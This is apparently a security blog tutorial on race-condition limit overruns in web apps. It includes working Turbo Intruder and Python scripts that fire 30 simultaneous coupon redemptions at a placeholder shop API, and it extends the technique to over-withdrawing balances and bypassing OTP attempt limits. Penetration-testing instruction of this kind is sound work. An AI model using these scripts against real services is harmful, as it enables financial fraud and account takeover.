cd ../blog

Race Conditions: The Limit-Overrun in Web Apps

Concurrent requests in a narrow time window can redeem a coupon twice or overdraw a balance. We cover the TOCTOU window and how to enforce atomicity.

Race conditions exploit the gap between checking a condition and acting on it — the time-of-check to time-of-use (TOCTOU) window. Interleave two requests inside that gap and an app that assumes operations happen one at a time will do something twice that should happen once: redeem a single-use coupon five times, overdraw a balance, claim a username twice. This is how to find and prove the limit overrun.

Finding it

The vulnerable shape reads a value, decides on it, then writes — with no atomicity binding the steps. Each individual request is perfectly valid in isolation; only the overlap is malicious, which is why reading the handler top-to-bottom looks correct and why these bugs survive review.

Where to hunt:

  • Discount codes, gift cards, referral/signup bonuses (redeem beyond the limit).
  • Balance withdrawals and inventory checks (over-withdraw, oversell).
  • "First one wins" claims — usernames, seats, handles.
  • Multi-step approvals where a state check and the transition are separate.

The detection question for any limited action is: "what if I send this N times simultaneously instead of once?" If the limit is enforced in two non-atomic steps, the answer is an overrun.

Proof of concept

The reliable modern technique is the single-packet attack, which coalesces many requests so they hit the server as close to simultaneously as the network allows, eliminating the jitter that used to make these races flaky. Turbo Intruder (Burp) implements it directly:

# Turbo Intruder: fire 30 identical coupon redemptions in one TCP packet
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)
    for i in range(30):
        engine.queue(target.req, gate='race1')   # hold all requests...
    engine.openGate('race1')                      # ...then release together

def handleResponse(req, interesting):
    table.add(req)

The request being raced is an ordinary redemption:

POST /api/cart/apply-coupon HTTP/1.1
Host: shop.example.com
Authorization: Bearer eyJ...
Content-Type: application/json

{"code": "SAVE50", "cart_id": "abc123"}

Confirm success by the outcome, not the responses: if SAVE50 is single-use but the cart shows the discount applied multiple times (or 12 of 30 requests returned 200 "applied"), the check-then-decrement raced. A quick scripted version without Burp:

import requests, concurrent.futures
URL = "https://shop.example.com/api/cart/apply-coupon"
H = {"Authorization": "Bearer eyJ...", "Content-Type": "application/json"}
body = {"code": "SAVE50", "cart_id": "abc123"}

def fire(_): return requests.post(URL, json=body, headers=H).status_code
with concurrent.futures.ThreadPoolExecutor(max_workers=30) as ex:
    print([c for c in ex.map(fire, range(30))].count(200), "of 30 applied")

Going further

The same primitive proves higher-value overruns:

  • Balance/withdrawal: race a withdrawal of your full balance N times; multiple successes mean you pulled more money than you had.
  • Gift card / wallet top-up: redeem one code into several accounts simultaneously.
  • Multi-step state: race a "submit for approval" against an "edit" so the object transitions while still mutable.
  • MFA / OTP windows: race the verification check so several guesses land before the attempt counter increments, sidestepping a "5 tries" limit.

A practical tell during recon is any endpoint whose success depends on a counter, a balance, or a uniqueness constraint that the code reads, branches on, and writes back in separate statements — that read-decide-write shape is the whole vulnerability.

Several factors widen the window and make exploitation reliable: horizontal scaling (requests hit different processes that do not share in-memory state), HTTP/2 multiplexing (many requests over one connection), and eventual-consistency stores that lag. Endpoints that were "theoretically racy but practically safe" are increasingly exploitable as a result.

Because the attack is pure timing, it leaves normal-looking requests in the logs — the proof is the state, so capture the before/after: the limit (uses_remaining = 1), the burst of simultaneous requests, and the violated invariant afterward (discount applied 12 times, balance negative). Test only on authorized targets with accounts you control.